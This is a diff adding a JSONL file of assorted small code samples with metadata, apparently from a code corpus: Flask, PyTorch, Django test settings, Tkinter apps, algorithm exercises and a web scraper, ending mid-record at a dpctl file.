diff --git "a/2560.jsonl" "b/2560.jsonl" new file mode 100644--- /dev/null +++ "b/2560.jsonl" @@ -0,0 +1,583 @@ +{"seq_id":"88163655","text":"\"\"\"types\"\"\"\nfrom flask import current_app as app, jsonify\n\nEventType = app.model.EventType\nThingType = app.model.ThingType\n\n@app.route('/types', methods=['GET'])\ndef list_types():\n event_types = [{'label': et.value, 'value': str(et)}\n for et in app.model.EventType]\n thing_types = [{'label': et.value, 'value': str(et)}\n for et in app.model.ThingType]\n return jsonify(event_types + thing_types), 200\n","sub_path":"routes/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"414337445","text":"# coding: utf-8\nfrom gensim import models\nfrom sklearn.decomposition import PCA\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\n\nfont_path = '/usr/share/fonts/truetype/takao-gothic/TakaoPGothic.ttf'\nfont_prop = FontProperties(fname=font_path)\nmatplotlib.rcParams['font.family'] = font_prop.get_name()\n\n\ndef draw_word_scatter(model, word, topn=30):\n \"\"\" 入力されたwordに似ている単語の分布図を描くためのメソッド \"\"\"\n\n # 似ている単語を求めるためにはGensim word2vecの以下の機能を利用\n # model.most_similar(word, topn=topn)\n words = [x[0] for x in sorted(model.most_similar(word, topn=topn))]\n words.append(word)\n\n # 各単語のベクトル表現を求めます。Gensimのmost_similarをベースとして\n # 単語のベクトルを返すメソッド(model.calc_vec)を定義しています\n vecs = [model[word] for word in words]\n\n # 分布図\n draw_scatter_plot(vecs, words)\n\ndef draw_scatter_plot(vecs, tags, clusters=None):\n \"\"\" 入力されたベクトルに基づき散布図(ラベル付き)を描くためのメソッド \"\"\"\n\n # Scikit-learnのPCAによる次元削減とその可視化\n pca = PCA(n_components=2)\n coords = pca.fit_transform(vecs)\n\n # matplotlibによる可視化\n fig, ax = plt.subplots()\n x = [v[0] for v in coords]\n y = [v[1] for v in coords]\n\n # 各点のクラスターが設定されていればクラスタを考慮\n if clusters:\n ax.scatter(x, y, c=clusters)\n else:\n ax.scatter(x, y)\n\n for i, txt in enumerate(tags):\n ax.annotate(txt, (coords[i][0], coords[i][1]))\n plt.show()\n\nif __name__ == \"__main__\":\n model = models.Doc2Vec.load('../model/doc2vec.model')\n draw_word_scatter(model, \"用心棒\", topn=40)\n \n","sub_path":"visualize/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"399412578","text":"from Tkinter import *\nimport pygame.mixer\n\nclass SoundPanel(Frame):\n\n def on_off(self):\n if self.tocando.get():\n #loops -1 = tocar pra sempre\n self.track.play(loops = -1)\n else:\n self.track.stop()\n\n def muda_volume(self, v):\n self.track.set_volume(self.volume.get())\n\n def __init__(self, app, mixer, sound_file):\n Frame.__init__(self, app)\n\n #http://www.pygame.org/docs/ref/mixer.html#pygame.mixer.Sound\n #cria um objeto de som, preferencialmente OGG ou WAV. suporte MP3 limitado\n self.track = mixer.Sound(sound_file)\n\n #cria uma variavel numerica pra ser setada no botao\n self.tocando = IntVar()\n\n #cria um botao de check pra definir on_off\n botaoTocar = Checkbutton(self, variable = self.tocando,\n command = self.on_off,\n text = sound_file)\n #posiciona o botao na tela\n botaoTocar.pack(side = RIGHT)\n\n #cria uma variavel numerica pra armazenar volume\n self.volume = DoubleVar()\n #define ela como o volume da faixa\n self.volume.set(self.track.get_volume())\n\n #cria um botao de escala pra definir volume\n escala = Scale(self, variable = self.volume,\n from_ = 0.0, to = 1.0, resolution = 0.1,\n command = self.muda_volume,\n label = 'Volume', orient = HORIZONTAL)\n #posiciona o botao na tela\n escala.pack(side = RIGHT)\n\n","sub_path":"sound_panel.py","file_name":"sound_panel.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"330708971","text":"from torch.autograd import Variable\r\nimport torch\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n# validation test\r\ndef validation(model, vad_loader, criterion, device):\r\n vad_loss = 0\r\n vad_acc = 0\r\n for i, (images, labels) in enumerate(vad_loader):\r\n images = Variable(images).to(device)\r\n labels = Variable(labels).to(device)\r\n outputs = model(images)\r\n loss = criterion(outputs, labels)\r\n vad_loss += loss.item()\r\n outputs = torch.argmax(outputs, dim=1)\r\n vad_acc += (outputs == labels).float().mean()\r\n vad_loss = vad_loss / len(vad_loader)\r\n vad_acc = vad_acc / len(vad_loader)\r\n return vad_loss, vad_acc\r\n\r\n\r\n# draw acc graph\r\ndef draw_plot(train_accs, vad_accs, file_name, config):\r\n plt.plot(train_accs, label='Train Acc')\r\n plt.plot(vad_accs, label='Vad Acc')\r\n plt.legend(frameon=False)\r\n plt.savefig(config['model_save_path'] + '\\\\' + file_name + '.png')\r\n plt.show()\r\n\r\n\r\n# get class activation map\r\ndef return_cam(feature_conv, weight_softmax, class_idx):\r\n size_upsample = (128, 128)\r\n bz, nc, h, w = feature_conv.shape\r\n output_cam = []\r\n for idx in class_idx:\r\n cam = weight_softmax[class_idx].dot(feature_conv.reshape((nc, h*w)))\r\n cam = cam.reshape(h, w)\r\n cam = cam - np.min(cam)\r\n cam_img = cam/np.max(cam)\r\n cam_img = np.uint8(255 * cam_img)\r\n output_cam.append(cv2.resize(cam_img, size_upsample))\r\n return output_cam\r\n","sub_path":"model_util.py","file_name":"model_util.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"412247070","text":"# -*- coding: utf-8 -*-\nimport os\n\nimport gensim\nimport numpy as np\nimport tensorflow as tf\n\nfrom configuration.config import w2v_data_path\n\n\nclass Vocab(object):\n def __init__(self):\n w2v_model = gensim.models.KeyedVectors.load(os.path.join(w2v_data_path, \"w2v_word_py3_baidu_0810\"))\n vocab = w2v_model.vocab\n self.vocab_size = len(vocab)\n print(\"vocab_size: {}\".format(self.vocab_size))\n\n self.token2id = {w: idx for idx, w in enumerate(vocab)}\n self.id2token = {idx: w for w, idx in self.token2id.items()}\n self.token2embed = {w: w2v_model.word_vec(w) for idx, w in enumerate(vocab)}\n\n self.pad_token = \"\"\n self.token2id.update({self.pad_token: len(self.token2id)})\n self.id2token.update({self.token2id[self.pad_token]: self.pad_token})\n self.token2embed.update({self.pad_token: [0.0] * 150})\n self.vocab_size += 1\n\n self.unk_token = \"\"\n self.token2id.update({self.unk_token: len(self.token2id)})\n self.id2token.update({self.token2id[self.unk_token]: self.unk_token})\n self.token2embed.update({self.unk_token: [0.0] * 150})\n self.vocab_size += 1\n\n self.embed_dim = 150\n\n # self.embeddings = [self.token2embed[self.id2token[i]] for i in range(self.vocab_size)]\n self.PAD_ID = self.token2id[self.pad_token]\n self.UNK_ID = self.token2id[self.unk_token]\n\n with tf.device(\"/cpu:0\"), tf.variable_scope(\"word_embedding\", reuse=tf.AUTO_REUSE):\n self.word_embedding = tf.get_variable(\n \"word_embedding\",\n shape=(self.vocab_size, self.embed_dim),\n initializer=tf.constant_initializer(np.array([self.token2embed[self.id2token[i]] for i in range(self.vocab_size)], dtype=np.float32)),\n trainable=False)\n\n\nkelvin_word_vocab = Vocab()\n","sub_path":"vocab_old.py","file_name":"vocab_old.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"85492051","text":"#!/usr/bin/env python\n# encoding: utf-8\n# ===============================================================================\n#\n# FILE:\n#\n# USAGE:\n#\n# DESCRIPTION:\n#\n# OPTIONS: ---\n# REQUIREMENTS: ---\n# BUGS: ---\n# NOTES: ---\n# AUTHOR: YOUR NAME (),\n# COMPANY:\n# VERSION: 1.0\n# CREATED:\n# REVISION: ---\n# ===============================================================================\n\nfrom comm.decorator import count_run_time\n\n\n@count_run_time\ndef index_of_min(lyst: list):\n \"\"\"\n 3.3.1 搜索最小值\n\n :param lyst:\n :return:\n \"\"\"\n min_index = 0\n current_index = 1\n while current_index < len(lyst):\n if lyst[current_index] < lyst[min_index]:\n min_index = current_index\n current_index += 1\n return min_index\n\n\n@count_run_time\ndef index_of_max(lyst: list):\n \"\"\"\n 3.3.1 拓展 搜索最大值\n\n :param lyst:\n :return:\n \"\"\"\n max_index = 0\n current_index = 1\n while current_index < len(lyst):\n if lyst[current_index] > lyst[max_index]:\n max_index = current_index\n current_index += 1\n return max_index\n\n\n@count_run_time\ndef sequential_search(t, lyst: list):\n \"\"\"\n 3.3.2 顺序搜索一个列表\n\n :param t:\n :param lyst:\n :return:\n \"\"\"\n _p = 0\n while _p < len(lyst):\n if t == lyst[_p]:\n return _p\n _p += 1\n return -1\n\n\n@count_run_time\ndef binary_search(t, lyst: list):\n \"\"\"\n 3.3.4 二叉树搜索,要求列表是排序过的\n\n :param t:\n :param lyst:\n :return:\n \"\"\"\n print(t >= lyst[0])\n if t < lyst[0] or t > lyst[-1]:\n raise ValueError(\"%d <= t <= %d\" % (lyst[0], lyst[-1]))\n left = 0\n right = len(lyst) - 1\n _count = 1\n print(\"搜索开始,left = %d, right = %d\" % (left, right))\n while left <= right:\n print(\"第%d次搜索\" % _count)\n # 整除\n mid = (left + right) // 2\n print(\"中间数为%d,值为%d\" % (mid, lyst[mid]))\n if t == lyst[mid]:\n print(\"第%d次找到了%d\" % (_count, t))\n return mid\n elif t < lyst[mid]:\n right = mid - 1\n print(\"%d < %d, set right = %d (%d - 1)\" % (\n t, lyst[mid], right, mid))\n else:\n left = mid + 1\n print(\"%d > %d, set left = %d (%d + 1)\" % (\n t, lyst[mid], left, mid))\n _count += 1\n raise ValueError(\"lyst not sorted\")\n\n","sub_path":"chapter_03/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"583804422","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2021-10-21 15:25:27\n# @Author : iamwm\n\nfrom asyncio.streams import StreamReader, StreamWriter\n\nfrom amp.broker.queue import MessageQueue\n\n\nclass Connection:\n \"\"\"\n connection used by broker\n \"\"\"\n\n def __init__(\n self,\n name: str,\n reader: StreamReader,\n writer: StreamWriter,\n ) -> None:\n self.name = name\n self.reader = reader\n self.writer = writer\n self.queue_context = {}\n\n def bind_queue(self, queue: MessageQueue):\n \"\"\"\n bind a queue to consumer\n \"\"\"\n queue.add_consumer({self.name: self})\n self.queue_context.update({queue.name: queue})\n\n async def on_create(self):\n \"\"\"\n things to do on connection created\n \"\"\"\n response = f\"connection from:{self.name} created!\"\n print(response)\n self.writer.write(response.encode())\n await self.writer.drain()\n\n async def on_close(self):\n \"\"\"\n things to do on connection cloesed\n \"\"\"\n response = f\"connection from:{self.name} closed!\"\n print(response)\n for _, queue in self.queue_context.items():\n queue.remove_consumer(self.name)\n","sub_path":"amp/broker/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"544585127","text":"from src.randomOps.randItemFromList import randItemFromList\n\n\nclass randItemsFromList(randItemFromList):\n def __init__(self, array, n):\n self.array = array\n self.genItems = []\n self.n = n\n self.generateChoices()\n\n def generateItems(self):\n if self.n <= len(self.array):\n for i in range(self.n):\n super().genItem()\n self.genItems.append(super().getItem())\n self.array.remove(super().getItem())\n else:\n self.genItems = \"ERROR: n is larger than array size\"\n\n def getItems(self):\n return self.genItems\n","sub_path":"src/randomOps/randItemsFromList.py","file_name":"randItemsFromList.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"211834414","text":"from __future__ import print_function\nimport os\nfrom collections import OrderedDict\nimport re\n\n\ndef makeFolder(folder):\n if os.path.exists(folder):\n pass\n else:\n os.makedirs(folder)\n\n\n# MAIN BELOW\n\n# Remember to change directory\nos.chdir(\"/Volumes/3Projects/OVMM-OhioVetMem/02_CONTENT/Exhibit Script_FINAL/Thematic Displays/\")\n\nwith open(\"_TH2ndCap.txt\", 'rU') as readFile: #.txt file\n inputTextList = readFile.readlines() #Returns a list\n\nwith open(\"_TH2ndCap_Credits.txt\", 'rU') as readFile: #.txt file\n inputCreditList = readFile.readlines() #Returns a list \n\n# Clean up inputTextList: get rid of empty items (eg. only newlines and spaces & newline)\ninputTextList = [text for text in inputTextList if text != \"\\n\" and not re.match(r\" +\\n\", text)]\n\n# Generate a list of where content codes appear\ncodeIndex = [index for index, entry in enumerate(inputTextList) if \"_\" in entry]\ncodeIndex.append(len(inputTextList))\n\n# creditDict is {gNumber : credit}\ncreditDict = {item.split(\"\\t\")[0] : item.split(\"\\t\")[1] for item in inputCreditList}\n\n# contentDict is {content code : list of captions}\ncontentDict = {inputTextList[codeIndex[i]].replace(\"\\n\", \"\").split(\" \")[0] :\\\n inputTextList[codeIndex[i]+1:codeIndex[i+1]] for i in range(len(codeIndex)-1)}\n\ncontentDict = OrderedDict(sorted(contentDict.items()))\n\ngNumDict = {}\ncapStarterDict = {}\n\n# Generate a dict of gNums and a dict of cap starter indices\n# gNumDict is {content code : list of gNums}\n# capStarterDict is {content code : list of indices}\nfor key in contentDict:\n gNumList = []\n capStarterIndex = []\n\n for index, item in enumerate(contentDict[key]):\n # This is g number: log it \n if re.match(r\"g\\d+\", item.lower()):\n gNumList.append(item[0:5]) # Don't include trailing newspace\n \n # This is caption starter: log its place\n elif \" \" in item:\n capStarterIndex.append(index)\n \n gNumDict[key] = gNumList\n capStarterDict[key] = capStarterIndex\n\ngNumDict = OrderedDict(sorted(gNumDict.items()))\ncapStarterDict = OrderedDict(sorted(capStarterDict.items()))\n\n# Get rid of newlines in credits\n# for key in creditDict:\n# if creditDict[key][-1] == \"\\n\":\n# creditDict[key] = creditDict[key][0:-1]\n\n# Empty this file\ncomboText = \"_TH_CAPS_combo.txt\"\nwith open(comboText, \"w+\") as comboFile:\n comboFile.write(\"\")\n\n# Iterate over contentDict to generate textblocks\n# and write files\nfor key in contentDict:\n capStarters = capStarterDict[key]\n gNums = gNumDict[key]\n\n # Generate clean captions for per caption group\n captionBlock = \"\"\n if not capStarters:\n captionBlock = contentDict[key][1] + \"\\n\"\n\n elif len(capStarters) < 2:\n for i in range(1, len(contentDict[key]) + 1, 2):\n captionBlock += contentDict[key][i] + \"\\n\"\n\n # captionBlock += \"\\n\"\n\n else:\n for i in range(len(capStarters)):\n start = capStarters[i]\n\n # Quick fix to circumvent IndexError (when end = i+1)\n if capStarters[i] == capStarters[-1]:\n end = len(contentDict[key])\n else:\n end = capStarters[i + 1]\n\n for j in range(start, end, 2):\n captionBlock += contentDict[key][j] + \"\\n\"\n\n captionBlock += \"\\n\"\n \n # Generate a list of credits per caption group\n creditList = []\n for gNum in gNumDict[key]:\n try:\n creditList.append(creditDict[gNum.lower()])\n \n except KeyError:\n creditList.append(\"Missing credit for {}\".format(gNum))\n \n # Get rid of credits that end in and empty space & strip quote marks\n creditList = [credit[:-1].strip('\"') if credit[-1] == \" \" else credit.strip('\"') for credit in creditList]\n\n # Generate semicolon-separated credits per caption group\n creditBlock = (\"; \".join(creditList))\n\n\n # Finally write some files\n # pathName = \"TH/CAPS/\"\n\n # makeFolder(pathName)\n\n # captionPath = os.path.join(pathName, key.upper() + \".txt\")\n\n # with open(captionPath, \"w\") as captionFile:\n # captionFile.write(captionBlock)\n # captionFile.write(\"\\n\" + creditBlock)\n\n\n # Append to combo file:\n with open(comboText, \"a+\") as comboFile:\n comboFile.write(\"------------\\n\" + key.upper() + \"\\n------------\\n\\n\")\n comboFile.write(\", \".join(gNums) + \"\\n\\n\\n\")\n comboFile.write(captionBlock + \"----------\\n\\n\")\n comboFile.write(creditBlock)\n comboFile.write(\"\\n\\n------------------------------------------------------------\\n\\n\")\n\n print(\"File {}.txt written\".format(key))\n ","sub_path":"contentSeparator/contentSeparatorCaptionsTH.py","file_name":"contentSeparatorCaptionsTH.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"461271879","text":"# Django settings for example project.\nimport os\nfrom decimal import Decimal\nDEBUG = True\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': ':memory:', # Or path to database file if using sqlite3.\n 'USER': '', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n}\n\nTIME_ZONE = 'America/Chicago'\nUSE_TZ = True\nLANGUAGE_CODE = 'en-us'\nSITE_ID = 1\nUSE_I18N = True\nUSE_L10N = True\nMEDIA_ROOT = ''\nMEDIA_URL = ''\nSTATIC_ROOT = ''\nSTATIC_URL = '/static/'\n\n\nSECRET_KEY = 'l#^#iad$8$4=dlh74$!xs=3g4jb(&j+y6*ozy&8k1-&d+vruzy'\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n)\n\nROOT_URLCONF = 'plans.urls'\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'ordered_model',\n 'plans',\n\n)\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'APP_DIRS': True,\n 'DIRS': [],\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n # django-plans context processor\n 'plans.context_processors.account_status',\n ],\n },\n },\n]\n\n\nLANGUAGES = (\n ('en', 'English'),\n ('pt_BR', 'Portuguese'),\n)\n\nPLANS_INVOICE_ISSUER = {\n \"issuer_name\": \"My Company Ltd\",\n \"issuer_street\": \"48th Suny street\",\n \"issuer_zipcode\": \"111-456\",\n \"issuer_city\": \"Django City\",\n \"issuer_country\": \"PL\",\n \"issuer_tax_number\": \"PL123456789\",\n}\n\nPLANS_TAX = Decimal('23.0')\nPLANS_TAXATION_POLICY = 'plans.taxation.eu.EUTaxationPolicy'\nPLANS_TAX_COUNTRY = 'PL'\n\nPLANS_VALIDATORS = {}\n\nPLANS_CURRENCY = 'EUR'\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\nLOGIN_REDIRECT_URL = '/foo/list/'","sub_path":"test_settings.py","file_name":"test_settings.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"246045630","text":"import tkinter as tk\nfrom tkinter import ttk \nimport requests\nfrom bs4 import BeautifulSoup\n\napp = tk.Tk()\napp.title('Парсер habr.com')\n\nsearch_label = ttk.Label(app, text='Введите количество постов: ')\nsearch_label.grid(row =0, column=0)\n\ntext_field = ttk.Entry(app, width=70)\ntext_field.grid(row=1, column=0)\n\ndef search():\n if text_field.get().strip() !=\"\":\n count = int(text_field.get())\n parse_page = ''\n\n if count % 20 == 0:\n pages_to_parse = count//20\n else:\n pages_to_parse = count//20 + 1\n\n for i in range (1, pages_to_parse+1):\n url = 'https://habr.com/ru/top/yearly/page' + str(i)\n r = requests.get(url)\n parse_page += r.text.replace('', '')\n\n soup = BeautifulSoup(parse_page, 'lxml')\n\n for i in range (0, count):\n post_title = soup.find_all('a', class_='post__title_link')[i].text\n post_text = BeautifulSoup(str(soup.find_all('div', class_='post__text')[i]).replace('
','').replace('\\r\\n',' ').replace('\\n',' '),'lxml').text\n post_date = soup.find_all('span', class_='post__time')[i].text\n post_author = soup.find_all('span', class_='user-info__nickname')[i].text\n\n file = open('habr.csv', 'a')\n file.write(post_title + ';')\n file.write(post_text + ';')\n file.write(post_date + ';')\n file.write(post_author + '\\n')\n file.close()\n\ndef enterBtn(event):\n search()\n\ndef searchBtn():\n search()\n\nbtn_search = ttk.Button(app, text=\"Найти\", width= 10, command=searchBtn)\nbtn_search.grid(row=1, column=1)\n\ntext_field.bind('', enterBtn)\n\napp.wm_attributes('-topmost', True)\n\napp.mainloop()\n","sub_path":"TkinterHabr.py","file_name":"TkinterHabr.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"176443702","text":"import json,requests\nimport global_vars as gv\nclass delete_gist :\n def __init__(self):\n self.headers=gv.headers\n def del_gist(self,gist_id):\n self.url='https://api.github.com/gists/'+gist_id\n req=requests.delete(self.url,headers=self.headers)\n if(req.status_code==204):\n print(\"succesfully deleted\")\n else:\n print(\"unsuccessful error code is \")\n print(req.status_code)\n\n","sub_path":"mygist/delete_gist.py","file_name":"delete_gist.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"344911757","text":"from DoublyLinkedNode import DoublyLinkedNode\n\nclass DoublyLinkedList:\n\n #implements the ADT List (List.py)\n #uses the DoublyLinkedNode class (DoublyLinkedNode.py)\n\n def __init__( self ):\n self._head = DoublyLinkedNode( None, None, None )\n self._trail = DoublyLinkedNode( None, None, None )\n self._head.next = self._trail\n self._trail.prev = self._head\n self._size = 0\n\n def __len__( self ):\n return self._size\n\n def __str__( self ):\n if self.is_empty():\n return \"[](size = 0)\"\n else:\n pp = \"[\"\n curr = self._head.next\n while curr.next != self._trail:\n pp += str( curr.element ) + \", \"\n curr = curr.next\n pp += str( curr.element ) + \"]\"\n pp += \"(size = \" + str( self._size ) + \")\"\n return pp\n\n def is_empty( self ):\n return self._size == 0\n\n def append( self, element ):\n newNode = DoublyLinkedNode( element, self._trail.prev, self._trail )\n self._trail.prev.next = newNode\n self._trail.prev = newNode\n self._size += 1\n\n def insert( self, element ):\n newNode = DoublyLinkedNode( element, self._head, self._head.next )\n self._head.next.prev = newNode\n self._head.next = newNode\n self._size += 1\n\n def remove( self, k ):\n if self.is_empty():\n return False\n elif k <= 0 or k > self._size:\n return False\n else:\n curr = self._head.next\n for i in range( k - 1 ):\n curr = curr.next\n curr.prev.next = curr.next\n curr.next.prev = curr.prev\n self._size -= 1\n return curr.element\n\n def find( self, element ):\n if self.is_empty():\n return False\n else:\n curr = self._head.next\n for i in range( self._size ):\n if curr.element == element:\n return i + 1\n else:\n curr = curr.next\n\n def last( self ):\n if self.is_empty():\n return False\n else:\n return self._trail.prev.element\n\n def first( self ):\n if self.is_empty():\n return False\n else:\n return self._head.next.element\n\n\"\"\"unit testing\n\"\"\"\nif __name__ == '__main__':\n\n data = DoublyLinkedList()\n print( data )\n\n data.append( 'titi' )\n data.append( 'toto' )\n data.append( 'tata' )\n print( data )\n\n idx = data.find( 'titi' )\n if idx:\n print( \"found titi ranked\", idx )\n else:\n print( \"titi not found\" )\n idx = data.find( 'cece' )\n if idx:\n print( \"found cece ranked\", idx )\n else:\n print( \"cece not found\" )\n\n print( \"remove 1 =\", data.remove( 1 ) )\n print( \"new size = \", str( len( data ) ) )\n print( data )\n print( \"remove 2 = \", data.remove( 2 ) )\n print( data )\n print( \"remove 1 = \", data.remove( 1 ) )\n print( data )\n print( \"remove 1 = \", data.remove( 1 ) )\n print( data )\n\n data.append( 'titi' )\n data.append( 'toto' )\n data.append( 'tata' )\n data.append( 'hala' )\n data.append( 'asma' )\n print( data )\n\n idx = data.find( 'titi' )\n if idx:\n print( \"found titi ranked\", idx )\n else:\n print( \"titi not found\" )\n idx = data.find( 'cece' )\n if idx:\n print( \"found cece ranked\", idx )\n else:\n print( \"cece not found\" )\n\n print( \"remove 3 =\", data.remove( 3 ) )\n print( \"new size = \", str( len( data ) ) )\n print( data )\n \n\n \n \n","sub_path":"weekly_classes/05-LISTES/DoublyLinkedList.py","file_name":"DoublyLinkedList.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"72086900","text":"# python lesson hw01-1\n# 2018/10/05\n\nfrom decimal import Decimal as dec\n\nmoney = dec(input(\"本金:\"))\nrate = dec(input(\"利率:\"))\nyears = dec(input(\"存幾年:\"))\n\nprint(\"和: {}\".format(money*(1+rate)**years))","sub_path":"hw01-1.py","file_name":"hw01-1.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"19419685","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 27 11:15:54 2018\n\n@author: Mehdi Senoussi\n\"\"\"\nimport numpy as np\nimport time\nfrom course_functions import plot_network, update_network\n\ntimesleep = .2\nn_tsteps = 100\ntimes = np.arange(n_tsteps)\nt = 1\n# output units\nydog = np.zeros(n_tsteps)\nycat = np.zeros(n_tsteps)\nincat = np.zeros(n_tsteps)\nindog = np.zeros(n_tsteps)\n# std of noise\nsigma = .25\n# learning rate\nalpha = .2\n\n#\nlayers = np.array([1, 1, 1, 2, 2])\nn_units = len(layers)\nactivations = np.array([1., 0., 0., 0., 0.])\nweights = np.zeros(shape=[n_units, n_units])\n\n# setting up weights for the cat-dog detector; note example is different from in book.\nweights[0, 3] = .4 # cats often bite visitors\nweights[0, 4] = .1 # dogs rarely bite visitors\nweights[1, 3] = .2 # cats often have four legs\nweights[1, 4] = .2 # dogs often have four legs\nweights[2, 3] = .1 # cats rarely have their pictures on FB\nweights[2, 4] = .4 # dogs often have their pictures on FB\nweights[3, 4] = -.2 # a cat cannot be a dog, and vice versa\n\n# computing the initial y activation values\nincat = weights[0, 3] * activations[0] + weights[1, 3] * activations[1] + weights[2, 3] * activations[2]\nindog = weights[0, 4] * activations[0] + weights[1, 4] * activations[1] + weights[2, 4] * activations[2]\nycat[t] = ycat[t-1] + alpha * (incat + weights[3, 4] * ydog[t-1]) + np.random.randn()*sigma\nydog[t] = ydog[t-1] + alpha * (indog + weights[3, 4] * ycat[t-1]) + np.random.randn()*sigma\nactivations[3:] = [ycat[t], ydog[t]]\nenergy = -incat*ycat[t] - indog*ydog[t] - weights[3, 4]*ycat[t]*ydog[t]\n\nfig, axs, texts_handles, lines_handles, unit_pos =\\\n plot_network(figsize = [13, 7], activations = activations,\n weights = weights, layers = layers, energy = energy)\n\n\nfor t in times[1:]:\n ycat[t] = ycat[t-1] + alpha * (incat + weights[3, 4] * ydog[t-1]) + np.random.randn()*sigma\n ydog[t] = ydog[t-1] + alpha * (indog + weights[3, 4] * ycat[t-1]) + np.random.randn()*sigma\n if ycat[t]<0 : ycat[t] = 0\n if ydog[t]<0: ydog[t] = 0\n activations[3:] = [ycat[t], ydog[t]]\n energy = -incat*ycat[t] - indog*ydog[t] - weights[3, 4]*ycat[t]*ydog[t]\n \n update_network(fig = fig, axs = axs, texts_handles = texts_handles,\n lines_handles = lines_handles, activations = activations,\n unit_pos = unit_pos, weights = weights, layers = layers, change = 0,\n cycle = t, energy = energy)\n\n time.sleep(timesleep)\n\n\n","sub_path":"AY 2018 - 2019/ch2_example_network_cat_dog.py","file_name":"ch2_example_network_cat_dog.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"422029929","text":"Mod = 1000000007\n\ndef fastpow(a,b,modu):\n ans = 1\n while b > 0:\n if (b & 1): ans = (ans * a) % modu\n a = (a * a) % modu\n b >>= 1\n return ans\n\n\nMaxN = 1000005\n\nfac = [1 for _ in range(MaxN)]\nifac = [1 for _ in range(MaxN)]\n\n\nfor i in range(1,MaxN):\n fac[i] = (fac[i - 1]*i) % Mod\n\nifac[MaxN - 1] = fastpow(fac[MaxN - 1],Mod - 2,Mod)\nfor i in range(MaxN - 2,-1,-1):\n ifac[i] = ((i + 1)*ifac[i + 1]) % Mod\n\n\n\ndef C(r,n):\n global Mod\n global fac\n global ifac\n ans = fac[n]\n ans = (ans*ifac[r]) % Mod\n ans = (ans*ifac[n - r]) % Mod\n return ans\n\nif __name__ == '__main__':\n\n n = int(input())\n for _ in range(n):\n a, b = map(int,input().split())\n print(C(b,a))\n","sub_path":"CSES/Mathematics/Task1079.py","file_name":"Task1079.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"478004181","text":"# Copyright 2021 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport dpctl\nimport numpy as 